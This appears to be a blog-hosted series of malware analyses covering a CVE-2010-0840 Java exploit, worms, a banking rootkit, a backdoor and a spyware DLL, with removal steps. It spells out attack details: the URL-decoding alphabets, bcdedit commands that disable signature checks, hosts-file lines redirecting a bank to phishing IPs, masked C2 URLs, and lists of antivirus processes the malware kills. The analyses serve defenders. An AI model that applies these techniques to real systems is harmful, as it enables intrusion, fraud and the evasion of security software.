The described collection of classes is an implementation of Java-applet (the main applet class is "efir"). The malicious applet uses the vulnerability CVE-2010-0840 for the purpuse of downloading files from the Internet to an infected computer. The vulnerability is is related to improper checks when executing privileged methods in the Java Runtime Environment, which allows attackers to execute arbitrary code via an untrusted object that extends the trusted class but has not modified a certain method.

The malicious applet is launched from an infected HTML-page by using the "<APPLET>" tag. URL for downloading file is passed to malicious applet as the tag parameter "kdwidth" in encrypted form. Decoding is performed by using the function "fipoluty", implemented in the class "efir". During decoding, the following correspondence between input and output symbols is used:

Input symbols:

xTc/8:G1RqgymtFz_S?nuJHkpP=DBaeOj2&7Q%Mh5bXdK0vf4E-YCisAwV9rI.3oZl6LN#UW

Output symbols:

0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#

Once launched, the exploit checks the name of the installed OS on the infected computer. If OS is different from Windows, the exploit will end its work.Otherwise, it downloads files from received URL. The downloaded file is stored as

%USERPROFILE%\<rnd>.exe

where - random fractional decimal numbers from 0 to 1.

This file is launched after the successful download.

Also, the exploit sets the value of "java.net.useSystemProxies" parameter to "true".

Removal Instructions

If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:

1. Delete the original exploit's file (its location on the infected computer will depend on how the program originally penetrated the victim machine).

2. Delete the file:

%USERPROFILE%\<rnd>.exe

3. Update Sun Java JRE and JDK to the latest versions.

4. Clear the Temporary Internet Files directory, which may contain infected files.

5. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Worm.Win32.Autorun.hfp

Playrhyba — Sun, 24 Jul 2011 21:06:47 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

Worm that spreads own copies on the user’s hard drive and through removable drives. It is a Windows application (PE-EXE file). Its size is 303,104 bytes. It is written in C++.

MD5: 7CB3DF16C623188729722859A36AAC76

SHA1: 9F8BF601AC2DCBED20E8D4C3D87E185DB27CCDEF

1 Installation
2 Spread Through Removable Devices
3 Payload
4 Removal Instructions

Installation

Once launched, the worm copies its body to the following files:

%Program  Files%\Windows Common Files\Commgr.exe
%Program  Files%\Windows Alerter\WinAlert.exe
<system drive>:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\WinSysApp.exe

The attributes "hidden" and "system" are set to this files.

To automatically start the copies every time you start the system the worm creates the system registry keys:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"WindowMessenger" = "<system drive>\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\WinSysApp.exe"
"Windows Alerter" = "%Program  Files%\Windows Alerter\WinAlert.exe"
"Windows Common Files Manager" = "%Program  Files%\Windows Common Files\Commgr.exe

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WindowMessenger" = "<system drive>\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\WinSysApp.exe"
"Windows Alerter" = "%Program  Files%\Windows Alerter\WinAlert.exe"
"Windows Common Files Manager" = "%Program  Files%\Windows Common Files\Commgr.exe"

In addition, the worm disables the display of hidden and system files/directories, as well as display the extensions for registered file types in Windows Explorer. For this purpose it changes the values of the following registry keys:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"
"ShowSuperHidden" = "0"
"SuperHidden" = "0"
"HideFileExt" = "1"

Spread Through Removable Devices

The worm сopies its executable file to all writable removable drives connected to the victim's computer:

<the infected partition's name>:\RECYCLER\<rnd>.exe

where <rnd> - a random string of letters (for example: "UxVgOoS").

Also the script "Autorun.inf" is created in the root directory of an infected disk:

<the infected partition's name>:\Autorun.inf

This script contains the following strings:

[Autorun]
Open=RECYCLER\<rnd>.exe
Explore=RECYCLER\<rnd>.exe
AutoPlay=RECYCLER\<rnd>.exe
shell\Open\Command=RECYCLER\<rnd>.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\<rnd>.exe
shell\Autoplay\Command=RECYCLER\<rnd>.exe

Also it creates the file on infected disk:

<the infected partition's name>:\RECYCLER\dEsKtOp.InI

This file contains the following strings:

[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}

Payload

Once launched, the worm performs the following actions:

It extracts from its body the following files:

<system drive>:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\bnf0342 (102266 bytes)
<system drive>:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\wndsvc.dll (4 bytes)

The attributes "hidden" and "system" are set to this files.

It executes all created copies. The worm monitors a list of running processes in the system. If there is no running process of at least one copy of the malware, all its copies will be restarted.
In a separate thread it terminates the process of the Windows Task Manager ("taskmgr.exe").
In a separate thread it monitors a user keyboard input. The collected data is stored to file:

<system drive>:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\info

In a separate thread every 2 seconds it performs the actions described in the Installation section.
In an endless loop every 5 seconds it copies the contents of the file:

<system drive>:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\bnf0342

to the file:

<system drive>:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\OnlyDbv.jpg

After that, it opens the file "OnlyDbv.jpg", preventing its removal.

Removal Instructions

If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:

1. Restart the computer in "Safe Mode" (at the beginning of loading press and hold «F8», then select «Safe Mode» at the Windows boot menu).

2. Delete the following files:

%Program  Files%\Windows Common Files\Commgr.exe
%Program  Files%\Windows Alerter\WinAlert.exe
<system drive>:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\WinSysApp.exe
<the infected partition's name>:\RECYCLER\<rnd>.exe
<the infected partition's name>:\Autorun.inf
<the infected partition's name>:\RECYCLER\dEsKtOp.InI
<system drive>:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\bnf0342
<system drive>:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\wndsvc.dll
<system drive>:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\info
<system drive>:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\OnlyDbv.jpg

3. Delete the original worm's file (its location on the infected computer will depend on how the program originally penetrated the victim machine).

4. Delete copies created by the worm on infected removable drives.

5. Delete the system registry keys:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"WindowMessenger" = "<system drive>\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\WinSysApp.exe"
"Windows Alerter" = "%Program  Files%\Windows Alerter\WinAlert.exe"
"Windows Common Files Manager" = "%Program  Files%\Windows Common Files\Commgr.exe

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WindowMessenger" = "<system drive>\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\WinSysApp.exe"
"Windows Alerter" = "%Program  Files%\Windows Alerter\WinAlert.exe"
"Windows Common Files Manager" = "%Program  Files%\Windows Common Files\Commgr.exe"

6. Restore the original registry key values:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"
"ShowSuperHidden" = "0"
"SuperHidden" = "0"
"HideFileExt" = "1"

7. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Exploit.Java.CVE-2010-0840.ay

Playrhyba — Sun, 17 Jul 2011 19:59:03 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

The malicious program is an exploit, which uses a vulnerability in JRE (Java Runtime Environment) to download other malicious programs from the Internet and execute them on the infected machine. It is a JAR-archive that contains a collection of Java-classes (class-files).Its size is 10,034 bytes.

MD5: 383133B52FFF57FB7B736082751D36F5

SHA1: 48A6F8FBD79740BDCFE637076FAAD21B26523442

Payload

The malicious JAR-archive contains the following files:

MessageStack\QueryConstructor.class (490 bytes)
MessageStack\QueryFromMessage.class (599 bytes)
MessageStack\StringPack.class (1320 bytes)
MessageStack\TemplateMessage.class (2047 bytes)
MessageStack\TextMessage.class (571 bytes)
xmlTools\Container.class (3756 bytes)
xmlTools\Translator.class (552 bytes)
xmlTools\xml2html.class (5203 bytes)
xmlTools\XmlConstruct.class (2784 bytes)

The malware is a Java-applet (the main applet class is "xml2html"), designed to downloading files from passed URLs, as well as launching downloaded files. It is launched from an infected HTML-page by using the "<APPLET>" tag. The list of URLs is passed to malicious applet as the tag parameter "prm" in encrypted form. Links in this list are separated by the symbols "::". Once launched, the exploit decrypts a received links by using the function "name" declared in the "StringPack" class . During decoding, the following correspondence between input and output symbols is used:

Input symbols:

QOn7cZAVmK/G4WuBqfLxj1_tlE8PTrpN2Y3:MUa=&5oRi%y?9DHv-Cgwkh60b.FdeSI#zJXs

Output symbols:

aDLXq-_.mjnWN6fwcsKB?xbITS=CykGvd91Z:%ElR5po0rzA8/JYP72#ue&t4iQFhVU3OMgH

Then the exploit checks the name of operating system installed on the infected computer. If OS is different from Windows, the exploit will end its work. Otherwise, it downloads files from received URLs. The malware determines the type of the downloaded file (executable file or DLL). The downloaded files are stored under random names in the temporary folder of the current user "%Temp%":

%Temp%\<rnd>.exe

%Temp%\<rnd>.dll

where <rnd> - random fractional decimal numbers from 0 to 1.

After successful downloading an executable file will be launched. In the case of loading a DLL, it will be launched by using the system utility "regsvr32.exe"

regsvr32 -s %Temp%\<rnd>.dll

During its work, the exploit uses the vulnerability CVE-2010-0840 in JRE (Java Runtime Environment). The vulnerability is related to improper checks when executing privileged methods in the Java Runtime Environment, which allows attackers to execute arbitrary code via an untrusted object that extends the trusted class but has not modified a certain method. This vulnerability allows malicious to inherit and use methods that are not available for a Java-applet class, which is a subclass of non-privileged "Applet" class.

Removal Instructions

If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:

1. Delete the original trojan file (its location on the infected computer will depend on how the program originally penetrated the victim machine).

2. Delete the following files:

%Temp%\<rnd>.exe
%Temp%\<rnd>.dll

3. Update Sun Java JRE and JDK to the latest versions.

4. Clear the Temporary Internet Files directory, which may contain infected files.

5. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Rootkit.Win64.Banker.a

Playrhyba — Sat, 09 Jul 2011 23:52:08 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

The malicious program is designed to remove components of security software Gbuster plugin for Internet Explorer. It is implemented as a kernel driver NT (kernel mode driver). It works under a 64-bit versions of Windows OS. Its size is 25,600 bytes.

Installation

The executable file of the malicious program is located in Windows drivers folder:

%Windir%\SysWOW64\drivers\plusdriver64.sys

The service named "driverusbplus" provides the automatic startup of the rootkit driver every time you start the system.

Also the rootkit installer disables the verification of digital signatures for kernel-mode modules in the current startup configuration by executing the following command:

bcdedit.exe-set loadoptions DDISABLE_INTEGRITY_CHECKS

In addition, it enables the mode allowing booting drivers signed with a test certificates by performing the following command:

bcdedit.exe-set TESTSIGNING ON

Thus the rootkit evades the validation of kernel-mode drivers digital signatures.

Payload

Once launched, the rootkit tries to delete the following files:

\Device\Harddisk0\Partition2\Arquivos de programas\GbPlugin\gbiehAbn.dll
\Device\Harddisk0\Partition2\Program Files\GbPlugin\gbiehAbn.dll
\Device\Harddisk0\Partition2\Program Files (x86)\GbPlugin\gbiehAbn.dll

\Device\Harddisk0\Partition2\Arquivos de programas\GbPlugin\abn.gpc
\Device\Harddisk0\Partition2\Program Files (x86)\GbPlugin\abn.gpc
\Device\Harddisk0\Partition2\Program Files\GbPlugin\abn.gpc

\Device\Harddisk0\Partition2\windows\Downloaded Program Files\ABN.inf
\Device\Harddisk0\Partition2\windows\Downloaded Program Files\ABN.gpc
\Device\Harddisk0\Partition2\windows\Downloaded Program Files\gbiehabn.dll
\Device\Harddisk0\Partition2\windows\Downloaded Program Files\GbPluginABN.inf

\Device\Harddisk0\Partition2\windows\Downloaded Program Files\gbpdist.dll
\Device\Harddisk0\Partition2\windows\Downloaded Program Files\gbiehAbn.dll

\Device\Harddisk0\Partition2\windows\system32\drivers\gbpkm.sys

\Device\Harddisk0\Partition2\Arquivos de programas\GbPlugin\gbieh.gmd
\Device\Harddisk0\Partition2\Program Files\GbPlugin\gbieh.gmd
\Device\Harddisk0\Partition2\Program Files (x86)\GbPlugin\gbieh.gmd

\Device\Harddisk0\Partition2\Arquivos de programas\GbPlugin\bb.gpc
\Device\Harddisk0\Partition2\Program Files\GbPlugin\bb.gpc
\Device\Harddisk0\Partition2\Program Files (x86)\bb.gpc

\Device\Harddisk0\Partition2\Arquivos de programas\GbPlugin\gbieh.dll
\Device\Harddisk0\Partition2\Program Files\GbPlugin\gbieh.dll
\Device\Harddisk0\Partition2\Program Files (x86)\gbieh.dll

\Device\Harddisk0\Partition2\windows\Downloaded Program Files\gbieh.gmd

\Device\Harddisk0\Partition2\Arquivos de programas\GbPlugin\Sv.exe
\Device\Harddisk0\Partition2\Program Files\GbPlugin\Sv.exe
\Device\Harddisk0\Partition2\Program Files (x86)\GbPlugin\Sv.exe

\Device\Harddisk0\Partition2\Arquivos de programas\GbPlugin\gbpdist.dll
\Device\Harddisk0\Partition2\Program Files\GbPlugin\gbpdist.dll
\Device\Harddisk0\Partition2\Program Files (x86)\gbpdist.dll

as well as the following registry keys:


\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\GbPluginAbn
\Registry\Machine\Software\Classes\CLSID\{2E3C3651-B19C-4DD9-A979-901EC3E930AF}
\Registry\Machine\Software\Classes\CLSID\{3F888695-9B41-4B29-9F44-6B560E464A16}
\Registry\Machine\Software\Classes\CLSID\{A3717295-941D-416F-9384-ED1736729F1C}
\Registry\Machine\Software\Classes\CLSID\{AF45043F-819C-47CC-9B37-94DBE50A6E63}
\Registry\Machine\Software\Classes\TypeLib\{04978612-A774-406D-AF1B-F44E2838D72A}
\Registry\Machine\Software\Classes\TypeLib\{9CA261C7-D518-4987-B434-10A1B243C8B8}
\Registry\Machine\Software\Classes\TypeLib\{AD764BE6-87A7-46A1-8C55-A712D079E749}

\Registry\Machine\System\CurrentControlSet\Services\GbpKm
\Registry\Machine\System\ControlSet001\Services\GbpKm

Also the rootkit adds the following strings:

216.155.133.236		www2.bancobrasil.com.br
216.155.133.237		aapj.bb.com.br
127.0.0.1		localhost
Hosts doWindows
Exemplo:
127.0.0.1 www.microsoft.com.br

to the file:

%System%\drivers\etc\hosts

Thus, it redirects users to the phishing sites when working with the Banco do Brasil bank's websites.

Removal Instructions

If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:

1. Delete the file:

%Windir%\SysWOW64\drivers\plusdriver64.sys

2. Remove the service named:

"Driverusbplus"

3. Restore the original contents of the file:

%System%\drivers\etc\hosts

This file usually contains the following text:

# Copyright (c) 1993-2009 Microsoft Corp.
	#
	# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
	#
	# This file contains the mappings of IP addresses to host names. Each
	# entry should be kept on an individual line. The IP address should
	# be placed in the first column followed by the corresponding host name.
	# The IP address and the host name should be separated by at least one
	# space.
	#
	# Additionally, comments (such as these) may be inserted on individual
	# lines or following the machine name denoted by a '#' symbol.
	#
	# For example:
	#
	#      102.54.94.97     rhino.acme.com          # source server
	#       38.25.63.10     x.acme.com              # x client host
	# localhost name resolution is handled within DNS itself.
	#	127.0.0.1       localhost

4. Restore the boot options, running the following commands:

bcdedit/deletevalue loadoptions
bcdedit.exe-set TESTSIGNING OFF

5. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Backdoor.Win32.Gbot.ggb

Playrhyba — Sun, 03 Jul 2011 17:54:02 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

Backdoor provides cybercriminals with remote access to an infected computer. It is Windows (PE-EXE) file. It is 193124 bytes in size. It is written in С++.

MD5: 7D346E1BF063B57C547CB031CC5ACB7F

SHA1: 73A1158CC70BA100999E3CB32A8AC2629E72F190

Installation

Once launched, the backdoor copies its body to a file:

%Temp%\csrss.exe

To launch the created copy automatically each time the system starts up it adds a reference to itself to the system registry:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"Load"="%Temp%\csrss.exe "

Payload

To control the uniqueness of its process the backdoor creates a unique identifier with the following names:

{5D92BB9F-9A66-458f-ACA4-66172A7016D4}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{CH5B35993-9674-43cd-8AC7-5BC5013E617B}
{HC0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
{B5B35993-9674-43cd-8AC7-5BC5013E617B}
{A5B35993-9674-43cd-8AC7-5BC5013E617B}
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{CH5BCA615-C82A-4152-8857-BCC626AE4C8D}
{HC3B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{45BCA615-C82A-4152-8857-BCC626AE4C8D}
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{C66E79CE-8935-4ed9-A6B1-4983619CB925}

Then malware creates a file with the name:

%Documents and Settings%\%Current User%\Application Data\<xxx>.<zzz> – it is 600 bytes in size.

where

xxx – a random alphanumeric sequence,

zzz – a random combination of digits.

This file stores the basic backdoor settings. Next the trojan creates a link which downloads the file. The link is formed as follows:

http://<server_domain_name>/<path _to_file>/<parameters>

where

server_domain_name:

booko*****catalog.com
freet*****iconline.com
sepa*****ilkandtee.com
high*****dbsearch.com
cata*****urcecodes.com
mobil*****sonlines.com
onlin*****uostore4you.com
nomo*****scat.com
lapo*****pia.com
fre*****sdb.com
sslpr*****mingshool.com
ddos*****eonline.com
samb*****ubonline.com
hl*****oz.com

path_to_file:

blog/images/3521.jpg
blog/images/3522.jpg
blog/images/3523.jpg

parameters:

v<decimal_number>=< decimal_number >&tq=<encrypted_data>

The downloaded files are stored under the names:

%Documents and Settings%\%Current User%\Application Data\Microsoft\conhost.exe – it is174592 bytes in size and detected by Kaspersky Antivirus as Backdoor.Win32.Gbot.grx
%Documents and Settings%\%Current User%\Application Data\dwm.exe – it is 185856 bytes in size and detected by Kaspersky Antivirus as Backdoor.Win32.Gbot.grx

After that the trojan runs the downloaded files with the following parameters:

Start %Documents and Settings%\%Current User%\Application Data\Microsoft\conhost.exe %%Documents and Settings%\%Current User%\Application Data\Microsoft,<path_to_original_backdoor_file>

Start %Documents and Settings%\%Current User%\Application Data\dwm.exe%%Documents and Settings%\%Current User%\Application Data, %Documents and Settings%\%Current User%\Application Data\Microsoft

To ensure that the copy created is launched automatically each time the system is rebooted, the following registry keys are created:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run] 
"conhost" = "%Documents and Settings%\%Current User%\Application Data\Microsoft\conhost.exe"

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 
"Shell" = "explorer.exe, %Documents and Settings%\%Current User%\Application Data\dwm.exe"

Sends an HTTP request "POST" with encrypted information about the infected system to an attacker’s server:

zo***g.com/index.html?tq=<encrypted_information>

Also it attempts to download malicious files by the following links:

http://mo*****om.at/polytheism/pictures/TanzenderShiva.jpg
http://cr*****afdesign.com/blog/images/share/stumble.png
http://cr*****afdesign.com/blog/images/share/facebook.png
http://rea*****waredevelopment.com/WindowsLiveWriter/web-2_0_thum
http://g*****ar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbc
http://f*****o.com/wp-content/uploads/2010/09/web-20-what-is-300x251.jpg
http://p**k.com/img/icons/twitter.png
http://p**k.com/img/icons/facebook.png
http://he*****lifenow.com/templates/7348/images/header_logo.jpg
http://he*****lifenow.com/templates/7349/images/header_logo.jpg
http://hol*****ndbarrett.com/images/footer/account.jpg
http://hol*****ndbarrett.com/images/footer/account.gif
http://nat*****utoelectric.com/images/50-217-1_F_1_.jpg
http://nat*****utoelectric.com/images/50-217-1_F_2_.jpg
http://onl*****zdirectory.com/images/PowerShowBanner.gif
http://onl*****zdirectory.com/images/PowerHideBanner.gif
http://los*****aganda.net/blog/pics/3321.jpg
http://los*****aganda.net/blog/pics/3322.jpg
http://jap*****greenteaonline.com/assets/images/greentea-cha-1.gif
http://jap*****greenteaonline.com/assets/images/greentea-cha-2.gif
http://gre*****balteaonline.com/images/greenherbalteagirlholdingcup250.gif
http://gre*****balteaonline.com/images/greenherbalteagirlholdingcup350.gif
http://onl*****stitute.com/g7/images/logo.jpg
http://onl*****stitute.com/g7/images/logo2.jpg
http://onl*****stitute.com/g7/images/logo3.jpg
http://onl*****stitute.com/g7/images/logo4.jpg
http://onl*****tingsecretfriends.com/images/im133.jpg
http://onl*****tingsecretfriends.com/images/im134.jpg

The downloaded files are stored in the temporary files folder of the current user:

%Temp%\<rnd>.tmp

where <rnd> - is a whole decimal number. The trojan opens a random TCP port to get a remote access to infected system, for example, "57414", "57455" or "62202." HTTP proxy server is created at the same port:

127.0.0.1:<port_number>

To change the settings in Internet Explorer the trojan modifies the following registry keys:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable"=dword:00000001
"ProxyServer"="http=127.0.0.1:<port_number>"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings"=<address_of _proxy _ in_hex>
"SavedLegacySettings"=<address_of_proxy_in_hex>

It attempts to disrupt antivirus applications:

AVG
Avira
Dr.Web
Norton
Symantec
Avast
McAfee
ESET NOD32
Kaspersky
BitDefender
Windows Defender

Removal instructions

If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:

1. Using Task Manager terminate the trojan processes:

conhost.exe
dwm.exe

2. Delete the registry keys in system registry:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"Load"="%Temp%\csrss.exe "

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run] 
"conhost" = "%Documents and Settings%\%Current User%\Application Data\Microsoft\conhost.exe " 

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 
"Shell" = "explorer.exe, %Documents and Settings%\%Current User%\Application Data\dwm.exe "

3. Restore original values of the keys in system registry:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 
"Shell" = "explorer.exe, %Documents and Settings%\%Current User%\Application Data\dwm.exe"

to:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 
"Shell" = "explorer.exe"

4. Delete files:

%Documents and Settings%\%Current User%\Application Data\<xxx>.<zzz>

where

xxx – a random alphanumeric sequence,

zzz – a random combination of digits.

%Temp%\csrss.exe
%Documents and Settings%\%Current User%\Application Data\Microsoft\conhost.exe
%Documents and Settings%\%Current User%\Application Data\dwm.exe

5. Clear the Temporary Internet Files folder, that may contain infected files.

6. Disable proxy in Internet browser.

7. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Worm.Win32.AutoRun.beot

Playrhyba — Sun, 26 Jun 2011 00:40:50 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

Worm copies itself to local disks and accessible network resources. It is Windows (PE-EXE file). It is 47733 bytes in size. It is packed by FSG. Unpacked file size is about 160 Kb. It is written in Delphi.

MD5: 950828248CEE2A08086B2207C5ED8516

SHA1: 8CE4CC71EAB155C2F0075B27287D7DE625A201A2

1 Installation
2 Propagation
3 Payload
4 Removal instruction

Installation

Once launched, the worm copies its body to a system disk of a user’s computer.

To ensure that the copy created is launched automatically each time the system is rebooted, the following registry key is created:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]

Propagation

The worm copies its body at all writable removable disks connected to the infected computer. The file "AutoRun.inf" is created together with a copy at the root of an infected disk. It provides for a copy to run each time a user opens an infected removable disk using "Explorer".

Payload

The worm has the following functional:

terminates processes:

360rpt.exe
360Safe.exe
360safebox.exe
360tray.exe
AgEntSvr.exe
AntiArp.exe
AppSvc32.exe
Arvmon.exe
AutoGuarder.exe
Autoruns.exe
Avgrssvc.exe
AvMonitor.exe
Avp.com
Avp.exe
CCEnter.exe
ccSvcHst.exe
HiJackThis.exe
IceSword.exe
iparmo.exe
Iparmor.exe
isPwdSvc.exe
kabaload.exe
KaScr9cn.SCR
KASMain.exe
KASTask.exe
KAS42.exe
KASDX.exe
KASPFW.exe
KASSetup.exe
KISLnchr.exe
KMailMon.exe
KPFW42.exe
KPFW42X.exe
KPFWSvc.exe
KRepair.COM
KVCEnter.kxp
KvDetEct.exe
kvfw.exe
KvfwMcl.exe
KVMonXP.kxp
KVMonXP_1.kxp
kvol.exe
kvolself.exe
KvReport.kxp
KV9can.kxp
KV9rvXP.exe
KVStub.kxp
kvupload.exe
kvwsc.exe
KvXP.kxp
KvXP_1.kxp
KWatch.exe
KWatch9x.exe
KWatchX.exe
MagicSet.exe
mmqczj.exe
mmsk.exe
NAVSetup.exe
nod32krn.exe
nod32kui.exe
PFW.exe
PFWLiveUpdate.exe
QHSET.exe
Ras.exe
Rav.exe
RavMon.exe
RavMonD.exe
RavStore.exe
RavStub.exe
ravt08.exe
RavTask.exe
RegClean.exe
RegEx.exe
rfwcfg.exe
RfwMain.exe
rfwolusr.exe
rfwProxy.exe
rfwsrv.exe
RsAgEnt.exe
RsMain.exe
runiep.exe
safebank.exe
safelive.exe
scan42.exe
9canFrm.exe
shcfg42.exe
SREng.exe
SREngPS.exe
symlcsvc.exe
syscheck.exe
Syscheck2.exe
SysSafe.exe
UmxAgEnt.exe
UmxCfg.exe
UmxPol.exe
UpLive.exe
LiveUpdate360.exe

Blocks running of these processes by creating the following registry keys:

 [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<Application name>]
"debugger"

where <Application name> - is process names from the list above.

Modifies the hosts file:

%System%\drivers\etc\hosts

Blocks addressing the following resources:

www.360.cn
www.360safe.cn
www.360safe.com
www.chinakv.com
www.rising.com.cn
www.jiangmin.com
www.duba.net
www.eset.com.cn
www.nod32.com
www.shadu.duba.net
union.kingsoft.com
www.kaspersky.com.cn
www.virustotal.com
www.virscan.org
www.kaspersky.com
www.lanniao.org
www.nod32club.com
www.dswlab.com
bbs.sucop.com
tool.ikaka.com
qihoo.com
www.kafan.cn8

Sends to a malicious server information about the system:

- IP-address of an infected computer;

- physical address of an active network adapter;

- OS version.

According to received from a server links an attacker can upload files, storing them in a temporary files folder of the current user "%Temp%".
In the course of its work the worm may connect to the following servers:

down.t***ai.com
208.***.210.29

The embedding of malicious code into an address space of the following processes is possible:

smss.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe

Removal instruction

If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:

1. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Trojan-Spy.Win32.Batton.rk

Playrhyba — Sat, 18 Jun 2011 23:10:22 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

Trojan-Spy spies upon user's activity and steals confidential user information. It is Windows DLL (PE DLL-file). It is 120359 in size. It is written in C++.

md5: D6AB8A0510BB02E4FC7500F9512355E2

sha1: 8E8417D3E5D0CE07A3CAE68D61E761CB86C66E33

Payload

This malware dll is used as a component of other malicious programs. The basic functionality is to provide an attacker with a remote access to a user’s computer and hiding its presence on a user's computer.

Once launched the library extracts from its body the driver:

%System%\_amdevntas.sys
(MD5: 72553ce6060c2d10eaf432b9f60ae511)

The file is 34816 bytes and detected by Kaspersky Antivirus as Rootkit.Win32.AntiAv.bq.

To run the extracted file the trojan creates and runs the service:

PDCOMP

At the same time adding information to the registry key:

[HKLM\SYSTEM\CurrentControlSet\Services\PDCOMP]
"ErrorControl" = "0"
"ImagePath" = "%System%\_amdevntas.sys"
"Start" = "3"
"Type" = 1

After the successful launch it removes the option "ImagePath" in the created registry key.

This driver performs the following actions:

1. Removes hooks installed in SSDT handle table to counteract protective and antiviral mechanisms in the system.

2. Hides its registry key by installing a hook on the function "HHIVE:: GetCellRoutine"

3. Hides files with the substring "amdevnta" by installing a hook on the function "IRP_MJ_DIRECTORY_CONTROL" in \FileSystem\Ntfs.

4. Hides its online activity by installing a hook on the function "IRP_MJ_DEVICE_CONTROL" in \Device\TCP.

5. Blocks obtaining a list of libraries loaded into a malicious process by installing a hook on function "ObReferenceObjectByHandle" to counteract protective and antiviral mechanisms.

6. Terminates processes with the following substrings:

ekrn
nod32
Scanner
avp
scan32
360
ScanFrm
ccSvcHst
avscan
xnlscn
V3Medic
AhnSD
Avast
Rtvscan
avg
uiscan
mcshield
Spider

7. Counteracts antivirus solutions by "ESTsoft" and "Doctor Web".

The trojan connects to a server of an attacker to provide a backdoor functional:

xiaonong.m****.com:80

Malicious library can perform the following steps, depending on the commands received from the attacker:

Interception of keys pressed by a user on a keyboard, received data is stored in the following file:

%CurrentDir%\syslog.dat

Blocking keys pressed by the user on a keyboard (keys or combination of keys are blocked specified by an attacker, for example, "Ctrl + Alt + Del" - the Task Manager call);
Emulating keystrokes;
Downloading and running other malicious files from addresses specified by an attacker (including the dll which can be used to download an updated version of the malware);
Opening Internet resources specified by an attacker using Internet Explorer (request to resources can be hidden, or, vice versa, - displayed to a user);
Installing services and records to run them automatically in the following registry key:

